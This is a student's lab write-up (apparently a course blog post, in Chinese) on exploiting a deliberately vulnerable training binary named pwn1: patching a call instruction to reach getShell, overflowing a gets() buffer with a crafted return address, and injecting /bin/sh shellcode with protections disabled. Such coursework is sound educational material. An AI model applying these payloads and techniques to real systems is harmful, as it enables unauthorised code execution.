2018-2019-2 20165316 《网络对抗技术》Exp1 PC平台逆向破解

2018-2019-2 20165316 《网络对抗技术》Exp1 PC平台逆向破解

1 逆向及Bof基础实践说明


1.1 实践目标

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。


  • 三个实践内容如下:

    • 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
    • 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
    • 注入一个自己制作的shellcode并运行这段shellcode。
  • 这几种思路,基本代表现实情况中的攻击目标:

    • 运行原本不可访问的代码片段
    • 强行修改程序执行流
    • 以及注入运行任意代码。

1.2 基础知识

  • 熟悉Linux基本操作
    • 能看懂常用指令,如管道(|),输入、输出重定向(>)等。
  • 理解Bof的原理。
    • 能看得懂汇编、机器指令、EIP、指令地址。
  • 会使用gdb,vi。
  • 指令、参数
    • NOP, JNE, JE, JMP, CMP汇编指令的机器码
      • NOP:NOP指令即“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。(机器码:90)
      • JNE:条件转移指令,如果不相等则跳转。(机器码:75)
      • JE:条件转移指令,如果相等则跳转。(机器码:74)
      • JMP:无条件转移指令。段内直接短转Jmp short(机器码:EB) 段内直接近转移Jmp near(机器码:E9) 段内间接转移 Jmp word(机器码:FF) 段间直接(远)转移Jmp far(机器码:EA)
      • CMP:比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果。cmp指令执行后,将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。
    • 常用的Linux基本操作
      • objdump -d:从objfile中反汇编那些特定指令机器码的section。
      • perl -e:后面紧跟单引号括起来的字符串,表示在命令行要执行的命令。
      • xxd:为给定的标准输入或者文件做一次十六进制的输出,它也可以将十六进制输出转换为原来的二进制格式。
      • ps -ef:显示所有进程,并显示每个进程的UID,父进程号,C与STIME栏位。
      • |:管道,将前者的输出作为后者的输入。
      • >:输入输出重定向符,将前者输出的内容输入到后者中。

2 直接修改程序机器指令,改变程序执行流程

  • 知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具

  • 学习目标:理解可执行文件与机器指令

  • 进阶:掌握ELF文件格式,掌握动态技术


下载目标文件pwn1,反汇编。


  • main函数调用foo,对应机器指令为“ e8 d7ffffff”,

    • 那我们想让它调用getShell,只要修改“d7ffffff”为,"getShell-80484ba"对应的补码就行。
    • 用Windows计算器,直接 47d-4ba就能得到补码,是c3ffffff。
  • 下面我们就修改可执行文件,将其中的call指令的目标地址由d7ffffff变为c3ffffff。


root@KaliYL:~# apt-get install wxhexeditor
root@KaliYL:~# wxHexEditor

我在图形化的16进制编程器中完成。安装代码参考老师教程,直接搜索d7即可得到修改位置,截图如下。


再反汇编看一下,call指令是否正确调用getShell,截图如下。

运行修改后的代码,可以得到shell提示符,效果如下。


3 通过构造输入参数,造成BOF攻击,改变程序执行流

知识要求:堆栈结构,返回地址

学习目标:理解攻击缓冲区的结果,掌握返回地址的获取

进阶:掌握ELF文件格式,掌握动态技术

3.1 反汇编,了解程序的基本功能


root@KaliYL:~#  objdump -d pwn1 | more

 8048477:	90                   	nop
 8048478:	e9 73 ff ff ff       	jmp    80483f0 <register_tm_clones>

== 注意这个函数getShell,我们的目标是触发这个函数  ==

0804847d <getShell>:
 804847d:	55                   	push   %ebp
 804847e:	89 e5                	mov    %esp,%ebp
 8048480:	83 ec 18             	sub    $0x18,%esp
 8048483:	c7 04 24 60 85 04 08 	movl   $0x8048560,(%esp)
 804848a:	e8 c1 fe ff ff       	call   8048350 <system@plt>
 804848f:	c9                   	leave  
 8048490:	c3                   	ret    

== 该可执行文件正常运行是调用如下函数foo,这个函数有Buffer overflow漏洞  ==

08048491 <foo>:
 8048491:	55                   	push   %ebp
 8048492:	89 e5                	mov    %esp,%ebp
 8048494:	83 ec 38             	sub    $0x38,%esp
 8048497:	8d 45 e4             	lea    -0x1c(%ebp),%eax
 804849a:	89 04 24             	mov    %eax,(%esp)
 
 == 这里读入字符串,但系统只预留了_28_字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址 ==
 
 804849d:	e8 8e fe ff ff       	call   8048330 <gets@plt>
 80484a2:	8d 45 e4             	lea    -0x1c(%ebp),%eax
 80484a5:	89 04 24             	mov    %eax,(%esp)
 80484a8:	e8 93 fe ff ff       	call   8048340 <puts@plt>
 80484ad:	c9                   	leave  
 80484ae:	c3                   	ret    

080484af <main>:
 80484af:	55                   	push   %ebp
 80484b0:	89 e5                	mov    %esp,%ebp
 80484b2:	83 e4 f0             	and    $0xfffffff0,%esp
 80484b5:	e8 d7 ff ff ff       	call   8048491 <foo>
 
 ==上面的call调用foo,同时在堆栈上压上返回地址值:__80484ba_== 
 
 80484ba:	b8 00 00 00 00       	mov    $0x0,%eax
 80484bf:	c9                   	leave  
 80484c0:	c3                   	ret    
 80484c1:	66 90                	xchg   %ax,%ax
 80484c3:	66 90                	xchg   %ax,%ax
 80484c5:	66 90                	xchg   %ax,%ax
 80484c7:	66 90                	xchg   %ax,%ax
 80484c9:	66 90                	xchg   %ax,%ax
 80484cb:	66 90                	xchg   %ax,%ax
 80484cd:	66 90                	xchg   %ax,%ax
 80484cf:	90                   	nop

080484d0 <__libc_csu_init>:

3.2 确认输入字符串哪几个字符会覆盖到返回地址

根据上文可以看出,想要覆盖返回地址首先要填充28+4=32个字节。

如果输入字符串1111111122222222333333334444444412345678,那 1234 那四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址,输给pwn1,pwn1就会运行getShell。

3.3 确认用什么值来覆盖返回地址

getShell的内存地址,通过反汇编时可以看到,即0804847d。

接下来要确认下字节序,简单说是输入11111111222222223333333344444444\x08\x04\x84\x7d,还是输入11111111222222223333333344444444\x7d\x84\x04\x08。

使用gdb进行调试。

对比之前 eip 0x34333231 0x34333231 ,正确应用输入 11111111222222223333333344444444\x7d\x84\x04\x08


3.4 构造输入字符串

由为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。

root@KaliYL:~# perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input

可以使用16进制查看指令xxd查看input文件的内容是否如预期。


然后将input的输入,通过管道符“|”,作为pwn1的输入。


4. 注入Shellcode并执行

4.1 准备一段Shellcode

  • shellcode就是一段机器指令(code)
    • 通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),
    • 所以这段机器指令被称为shellcode。
    • 在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。

最基本的shellcode的编写可参考许同学的文章Shellcode入门,写得非常之清楚详实。以下实践即使用该文章中生成的shellcode。如下:


\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\

4.2 准备工作

修改些设置。这部分的解释请看第5小节Bof攻击防御技术.

4.3 构造要注入的payload。

  • Linux下有两种基本构造攻击buf的方法:
    • retaddr+nop+shellcode
    • nop+shellcode+retaddr。
  • 因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面,要不在它后面。
  • 简单说缓冲区小就把shellcode放后边,缓冲区大就把shellcode放前边

正确结构为:anything+retaddr+nops+shellcode。

以上实践是在非常简单的一个预设条件下完成的:

(1)关闭堆栈保护(gcc -fno-stack-protector

(2)关闭堆栈执行保护(execstack -s)

(3)关闭地址随机化 (/proc/sys/kernel/randomize_va_space=0)

(4)在x32环境下

(5)在Linux实践环境

可以继续研究更换以上任何一个条件下如何继续bof攻击。

5 实验中遇到的问题及思考

  • 基本没遇到什么坑,就是感觉自己的汇编语言全还给老师了。
  • 陷入了老师教程中的坑里,试了好几次都有问题,最后发现是注入结构有问题,事实上shellcode正好填满缓冲区,导致其代码可能在运行时被覆盖掉了,具体问题可以通过汇编代码分析。

6 扩展阅读

64位系统对BOF攻击影响非常大,基本先天免疫。一个原因是地址空间大,每个地址都有大量00,没法注啊。启用地址随机化后,也没法猜啊。想研究可以读下附件中的《x86-64 buffer overflow.pdf》。

接下来可以做一下实验楼的Return-to-libc 攻击实验。再研究 rop (Return Orientated Programming)rop攻击实例。多动手实践基本Linux漏洞攻击

最后看看各种技术持综述:矛与盾:二进制漏洞攻防思想对抗

posted @ 2019-03-15 23:24  treebeard  阅读(236)  评论(0编辑  收藏  举报